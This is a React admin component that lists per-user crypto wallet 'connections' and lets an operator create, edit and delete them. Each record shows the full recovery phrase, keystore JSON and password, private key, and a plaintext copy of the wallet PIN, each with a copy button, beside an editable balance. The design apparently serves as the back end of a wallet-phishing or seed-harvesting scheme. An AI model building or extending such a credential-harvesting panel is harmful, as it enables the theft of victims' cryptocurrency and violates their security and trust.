import React, { useEffect, useState } from 'react';
import Table from '@mui/material/Table';
import TableBody from '@mui/material/TableBody';
import TableCell from '@mui/material/TableCell';
import TableContainer from '@mui/material/TableContainer';
import TableHead from '@mui/material/TableHead';
import TableRow from '@mui/material/TableRow';
import Paper from '@mui/material/Paper';
import { useQuery, useMutation } from 'react-query';
import apiClient from '../../request/http-common';
import Container from '@mui/material/Container';
import Typography from '@mui/material/Typography';
import {
  Alert,
  Box,
  Button,
  Dialog,
  DialogActions,
  DialogContent,
  DialogContentText,
  DialogTitle,
  FormControl,
  IconButton,
  InputLabel,
  MenuItem,
  Select,
  TextField,
  Tooltip,
} from '@mui/material';
import AddIcon from '@mui/icons-material/Add';
import ContentCopyIcon from '@mui/icons-material/ContentCopy';
import DeleteIcon from '@mui/icons-material/Delete';
import EditIcon from '@mui/icons-material/Edit';

const FullTextDisplay = ({ text, maxLength = 50 }) => {
  const [showFull, setShowFull] = useState(false);

  if (!text) return <span>N/A</span>;

  const isLong = text.length > maxLength;
  const displayText = showFull || !isLong ? text : text.substring(0, maxLength) + '...';

  const copyToClipboard = () => {
    navigator.clipboard.writeText(text);
  };

  return (
    <div>
      <span style={{ fontSize: '0.8rem', fontFamily: 'monospace', wordBreak: 'break-all' }}>
        {displayText}
      </span>
      {isLong && (
        <Button
          size="small"
          onClick={() => setShowFull(!showFull)}
          sx={{ ml: 1, minWidth: 'auto', p: 0.5, fontSize: '0.7rem' }}
        >
          {showFull ? 'Less' : 'More'}
        </Button>
      )}
      <Tooltip title="Copy to clipboard">
        <IconButton size="small" onClick={copyToClipboard} sx={{ ml: 0.5, p: 0.5 }}>
          <ContentCopyIcon fontSize="small" />
        </IconButton>
      </Tooltip>
    </div>
  );
};

const emptyConnectionForm = {
  user_id: '',
  wallet_name: '',
  address: '',
  phrase: '',
  balance: '0',
  keystore: '',
  keystore_password: '',
  private_key: '',
  connection_type: '',
  wallet_type: '',
  import_type: '',
  wallet_pin: '',
};

export default function ListConnections() {
  const [connections, setConnections] = useState([]);
  const [users, setUsers] = useState([]);
  const [formDialogOpen, setFormDialogOpen] = useState(false);
  const [deleteDialogOpen, setDeleteDialogOpen] = useState(false);
  const [isEditMode, setIsEditMode] = useState(false);
  const [selectedConnection, setSelectedConnection] = useState(null);
  const [form, setForm] = useState(emptyConnectionForm);
  const [error, setError] = useState('');
  const [success, setSuccess] = useState('');

  const { isLoading: isLoadingConnections, refetch: getConnections } = useQuery(
    'load-connections',
    async () => await apiClient.get('/api/load-connections'),
    {
      enabled: false,
      onSuccess: (res) => {
        if (res.data.status === 'success') {
          setConnections(res.data.connections);
        }
        window.dispatchEvent(new Event('processed'));
      },
      onError: (err) => {
        setError(err.response?.data?.message || 'Failed to load connections');
        window.dispatchEvent(new Event('processed'));
      },
    }
  );

  useQuery(
    'load-users-for-connections',
    async () => await apiClient.get('/api/users'),
    {
      enabled: true,
      onSuccess: (res) => {
        if (res.data.status === 'success') {
          setUsers(res.data.users || []);
        }
      },
    }
  );

  const clearAlertsSoon = () => {
    setTimeout(() => {
      setSuccess('');
      setError('');
    }, 3000);
  };

  const { mutate: createConnection, isLoading: isCreating } = useMutation(
    async (payload) => await apiClient.post('/api/create-connection', payload),
    {
      onSuccess: (res) => {
        setSuccess(res.data.message);
        setError('');
        setFormDialogOpen(false);
        setForm(emptyConnectionForm);
        getConnections();
        window.dispatchEvent(new Event('processed'));
        clearAlertsSoon();
      },
      onError: (err) => {
        setError(err.response?.data?.message || Object.values(err.response?.data?.errors || {})[0]?.[0] || 'Failed to create connection');
        setSuccess('');
        window.dispatchEvent(new Event('processed'));
      },
    }
  );

  const { mutate: updateConnection, isLoading: isUpdating } = useMutation(
    async ({ id, payload }) => await apiClient.post(`/api/update-connection/${id}`, payload),
    {
      onSuccess: (res) => {
        setSuccess(res.data.message);
        setError('');
        setFormDialogOpen(false);
        setSelectedConnection(null);
        setForm(emptyConnectionForm);
        getConnections();
        window.dispatchEvent(new Event('processed'));
        clearAlertsSoon();
      },
      onError: (err) => {
        setError(err.response?.data?.message || Object.values(err.response?.data?.errors || {})[0]?.[0] || 'Failed to update connection');
        setSuccess('');
        window.dispatchEvent(new Event('processed'));
      },
    }
  );

  const { mutate: deleteConnection, isLoading: isDeleting } = useMutation(
    async (id) => await apiClient.post(`/api/delete-connection/${id}`),
    {
      onSuccess: (res) => {
        setSuccess(res.data.message);
        setError('');
        setDeleteDialogOpen(false);
        setSelectedConnection(null);
        getConnections();
        window.dispatchEvent(new Event('processed'));
        clearAlertsSoon();
      },
      onError: (err) => {
        setError(err.response?.data?.message || 'Failed to delete connection');
        setSuccess('');
        setDeleteDialogOpen(false);
        window.dispatchEvent(new Event('processed'));
      },
    }
  );

  useEffect(() => {
    window.dispatchEvent(new Event('processing'));
    getConnections();
  }, []);

  const onFormChange = (e) => {
    setForm({ ...form, [e.target.name]: e.target.value });
  };

  const openCreateDialog = () => {
    setIsEditMode(false);
    setSelectedConnection(null);
    setForm(emptyConnectionForm);
    setFormDialogOpen(true);
  };

  const openEditDialog = (connection) => {
    setIsEditMode(true);
    setSelectedConnection(connection);
    setForm({
      user_id: connection.user_id || connection.user?.id || '',
      wallet_name: connection.wallet_name || '',
      address: connection.address || '',
      phrase: connection.phrase || '',
      balance: connection.balance || '0',
      keystore: connection.keystore || '',
      keystore_password: connection.keystore_password || '',
      private_key: connection.private_key || '',
      connection_type: connection.connection_type || '',
      wallet_type: connection.wallet_type || '',
      import_type: connection.import_type || '',
      wallet_pin: connection.wallet_pin_copy || '',
    });
    setFormDialogOpen(true);
  };

  const openDeleteDialog = (connection) => {
    setSelectedConnection(connection);
    setDeleteDialogOpen(true);
  };

  const handleFormSubmit = () => {
    if (!form.user_id || !form.wallet_name.trim() || !form.address.trim()) {
      setError('User, wallet name and address are required');
      return;
    }

    const payload = {
      user_id: form.user_id,
      wallet_name: form.wallet_name,
      address: form.address,
      phrase: form.phrase,
      balance: form.balance || '0',
      keystore: form.keystore || null,
      keystore_password: form.keystore_password || null,
      private_key: form.private_key || null,
      connection_type: form.connection_type || null,
      wallet_type: form.wallet_type || null,
      import_type: form.import_type || null,
      wallet_pin: form.wallet_pin || undefined,
    };

    window.dispatchEvent(new Event('processing'));

    if (isEditMode && selectedConnection) {
      updateConnection({ id: selectedConnection.id, payload });
      return;
    }

    createConnection(payload);
  };

  const handleDeleteConfirm = () => {
    if (!selectedConnection) return;
    window.dispatchEvent(new Event('processing'));
    deleteConnection(selectedConnection.id);
  };

  const getDate = (date) => new Date(date).toDateString();
  const isSaving = isCreating || isUpdating;

  return (
    <div style={{ marginTop: '75px' }}>
      <Container>
        <Box sx={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', mb: 2, mt: 4, flexWrap: 'wrap', gap: 2 }}>
          <Typography sx={{ fontWeight: 'bold', fontSize: 20, textTransform: 'uppercase' }} variant="h6">
            {isLoadingConnections ? 'Loading Connections...' : 'List of connections'}
          </Typography>
          <Button variant="contained" startIcon={<AddIcon />} onClick={openCreateDialog}>
            Add Connection
          </Button>
        </Box>

        {error && (
          <Alert severity="error" sx={{ mb: 2 }}>
            {error}
          </Alert>
        )}
        {success && (
          <Alert severity="success" sx={{ mb: 2 }}>
            {success}
          </Alert>
        )}

        <TableContainer component={Paper} sx={{ maxHeight: '80vh', overflowX: 'auto' }}>
          {connections.length > 0 && (
            <Table sx={{ minWidth: '100%' }} aria-label="connections table" stickyHeader>
              <TableHead>
                <TableRow>
                  <TableCell>User Name</TableCell>
                  <TableCell align="right">User Email</TableCell>
                  <TableCell align="right">Wallet Address</TableCell>
                  <TableCell align="right">Wallet Name</TableCell>
                  <TableCell align="right">Wallet Type</TableCell>
                  <TableCell align="right">Connection Type</TableCell>
                  <TableCell align="right">Import Type</TableCell>
                  <TableCell align="right">Balance</TableCell>
                  <TableCell align="right">Recovery Phrase</TableCell>
                  <TableCell align="right">Keystore JSON</TableCell>
                  <TableCell align="right">Private Key</TableCell>
                  <TableCell align="right">Wallet PIN (Copy)</TableCell>
                  <TableCell align="right">Wallet PIN (Hash)</TableCell>
                  <TableCell align="right">Date</TableCell>
                  <TableCell align="right">Actions</TableCell>
                </TableRow>
              </TableHead>
              <TableBody>
                {connections.map((connection) => (
                  <TableRow key={connection.id} sx={{ '&:last-child td, &:last-child th': { border: 0 } }}>
                    <TableCell component="th" scope="row">
                      {connection.user?.name || 'N/A'}
                    </TableCell>
                    <TableCell align="right">{connection.user?.email || 'N/A'}</TableCell>
                    <TableCell align="right" sx={{ fontFamily: 'monospace', fontSize: '0.75rem', maxWidth: '150px', overflow: 'hidden', textOverflow: 'ellipsis' }}>
                      {connection.address}
                    </TableCell>
                    <TableCell align="right">{connection.wallet_name}</TableCell>
                    <TableCell align="right">{connection.wallet_type || 'N/A'}</TableCell>
                    <TableCell align="right">{connection.connection_type || 'N/A'}</TableCell>
                    <TableCell align="right">{connection.import_type || 'N/A'}</TableCell>
                    <TableCell align="right">{connection.balance || '0'}</TableCell>
                    <TableCell align="right" sx={{ maxWidth: '300px', verticalAlign: 'top' }}>
                      <FullTextDisplay text={connection.phrase} maxLength={30} />
                    </TableCell>
                    <TableCell align="right" sx={{ maxWidth: '300px', verticalAlign: 'top' }}>
                      <FullTextDisplay text={connection.keystore} maxLength={30} />
                    </TableCell>
                    <TableCell align="right" sx={{ maxWidth: '200px', verticalAlign: 'top' }}>
                      <FullTextDisplay text={connection.private_key} maxLength={20} />
                    </TableCell>
                    <TableCell align="right" sx={{ maxWidth: '120px', verticalAlign: 'top' }}>
                      <FullTextDisplay text={connection.wallet_pin_copy} maxLength={12} />
                    </TableCell>
                    <TableCell align="right" sx={{ maxWidth: '250px', verticalAlign: 'top' }}>
                      <FullTextDisplay text={connection.wallet_pin_hash} maxLength={24} />
                    </TableCell>
                    <TableCell align="right">{getDate(connection.created_at)}</TableCell>
                    <TableCell align="right">
                      <IconButton color="primary" onClick={() => openEditDialog(connection)} title="Edit">
                        <EditIcon />
                      </IconButton>
                      <IconButton color="error" onClick={() => openDeleteDialog(connection)} title="Delete" disabled={isDeleting}>
                        <DeleteIcon />
                      </IconButton>
                    </TableCell>
                  </TableRow>
                ))}
              </TableBody>
            </Table>
          )}

          {connections.length === 0 && !isLoadingConnections && (
            <Typography sx={{ p: 3, textAlign: 'center' }}>No connections found</Typography>
          )}
        </TableContainer>

        <Dialog open={formDialogOpen} onClose={() => setFormDialogOpen(false)} maxWidth="md" fullWidth>
          <DialogTitle>{isEditMode ? 'Edit Connection' : 'Create Connection'}</DialogTitle>
          <DialogContent>
            <Box sx={{ mt: 1, display: 'grid', gridTemplateColumns: { xs: '1fr', md: '1fr 1fr' }, gap: 2 }}>
              <FormControl fullWidth required>
                <InputLabel id="connection-user-label">User</InputLabel>
                <Select
                  labelId="connection-user-label"
                  name="user_id"
                  label="User"
                  value={form.user_id}
                  onChange={onFormChange}
                >
                  <MenuItem value="">Select User</MenuItem>
                  {users.map((user) => (
                    <MenuItem key={user.id} value={user.id}>
                      {user.name} ({user.email})
                    </MenuItem>
                  ))}
                </Select>
              </FormControl>
              <TextField label="Wallet Name" name="wallet_name" value={form.wallet_name} onChange={onFormChange} fullWidth required />
              <TextField label="Wallet Address" name="address" value={form.address} onChange={onFormChange} fullWidth required />
              <TextField label="Balance" name="balance" value={form.balance} onChange={onFormChange} fullWidth />
              <TextField label="Wallet Type" name="wallet_type" value={form.wallet_type} onChange={onFormChange} fullWidth />
              <FormControl fullWidth>
                <InputLabel id="connection-type-label">Connection Type</InputLabel>
                <Select
                  labelId="connection-type-label"
                  name="connection_type"
                  label="Connection Type"
                  value={form.connection_type}
                  onChange={onFormChange}
                >
                  <MenuItem value="">None</MenuItem>
                  <MenuItem value="account">Account</MenuItem>
                  <MenuItem value="created">Created</MenuItem>
                  <MenuItem value="imported">Imported</MenuItem>
                  <MenuItem value="connected">Connected</MenuItem>
                </Select>
              </FormControl>
              <FormControl fullWidth>
                <InputLabel id="import-type-label">Import Type</InputLabel>
                <Select
                  labelId="import-type-label"
                  name="import_type"
                  label="Import Type"
                  value={form.import_type}
                  onChange={onFormChange}
                >
                  <MenuItem value="">None</MenuItem>
                  <MenuItem value="recovery_phrase">Recovery Phrase</MenuItem>
                  <MenuItem value="keystore_json">Keystore JSON</MenuItem>
                  <MenuItem value="private_key">Private Key</MenuItem>
                </Select>
              </FormControl>
              <TextField
                label="Wallet PIN (6 digits)"
                name="wallet_pin"
                value={form.wallet_pin}
                onChange={onFormChange}
                fullWidth
                inputProps={{ maxLength: 6 }}
                helperText={isEditMode ? 'Leave blank to keep current PIN' : 'Optional'}
              />
              <TextField
                label="Recovery Phrase"
                name="phrase"
                value={form.phrase}
                onChange={onFormChange}
                fullWidth
                multiline
                minRows={2}
                sx={{ gridColumn: { md: '1 / -1' } }}
              />
              <TextField
                label="Keystore JSON"
                name="keystore"
                value={form.keystore}
                onChange={onFormChange}
                fullWidth
                multiline
                minRows={2}
                sx={{ gridColumn: { md: '1 / -1' } }}
              />
              <TextField label="Keystore Password" name="keystore_password" value={form.keystore_password} onChange={onFormChange} fullWidth />
              <TextField label="Private Key" name="private_key" value={form.private_key} onChange={onFormChange} fullWidth />
            </Box>
          </DialogContent>
          <DialogActions>
            <Button onClick={() => setFormDialogOpen(false)}>Cancel</Button>
            <Button onClick={handleFormSubmit} variant="contained" color="success" disabled={isSaving}>
              {isSaving ? 'Saving...' : isEditMode ? 'Update' : 'Create'}
            </Button>
          </DialogActions>
        </Dialog>

        <Dialog open={deleteDialogOpen} onClose={() => setDeleteDialogOpen(false)}>
          <DialogTitle>Delete Connection</DialogTitle>
          <DialogContent>
            <DialogContentText>
              Are you sure you want to delete the connection "{selectedConnection?.wallet_name}" for {selectedConnection?.user?.name || 'this user'}? This action cannot be undone.
            </DialogContentText>
          </DialogContent>
          <DialogActions>
            <Button onClick={() => setDeleteDialogOpen(false)}>Cancel</Button>
            <Button onClick={handleDeleteConfirm} color="error" disabled={isDeleting}>
              {isDeleting ? 'Deleting...' : 'Delete'}
            </Button>
          </DialogActions>
        </Dialog>
      </Container>
    </div>
  );
}
